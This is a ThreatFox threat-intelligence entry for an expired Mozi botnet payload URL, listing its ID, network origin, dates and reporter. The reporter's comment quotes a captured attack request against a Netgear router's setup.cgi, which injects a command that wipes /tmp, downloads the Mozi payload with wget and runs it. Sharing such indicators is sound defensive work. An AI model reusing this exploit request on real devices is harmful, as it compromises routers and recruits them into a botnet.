ThreatFox IOC Database
You are viewing the ThreatFox database entry for url http://115.58.134.62:39193/Mozi.m.
Database Entry
This IOC expired
This IOC is an old IOC and hence has expired on 2025-12-06 01:15:01 UTC. We therefore refrain from exporting it into our datasets. As a result, this database entry is purely informational and has no impact.
| IOC ID: | 313046 |
|---|---|
| IOC: | http://115.58.134.62:39193/Mozi.m |
| IOC Type : | url |
| Threat Type : | payload_delivery |
| Malware: | Mozi |
| Confidence Level : | Confidence level is high (100%) |
| ASN: | AS4837 CHINA169-Backbone |
| Country: |  CN |
| First seen: | 2022-01-22 16:26:29 UTC |
| Last seen: | never |
| UUID: | 0d8523eb-7ba0-11ec-8ab6-42010aa4000a |
| Reporter |  fish_illuminati |
| Reward | 5 credits from ThreatFox |
| Tags: | exploit Mozi netgear |
fish_illuminati
IP: 115.58.134.62Method: GET
Path: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.134.62:39193/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
Protocol: HTTP/1.0
Referrer: None
Host:
Useragent: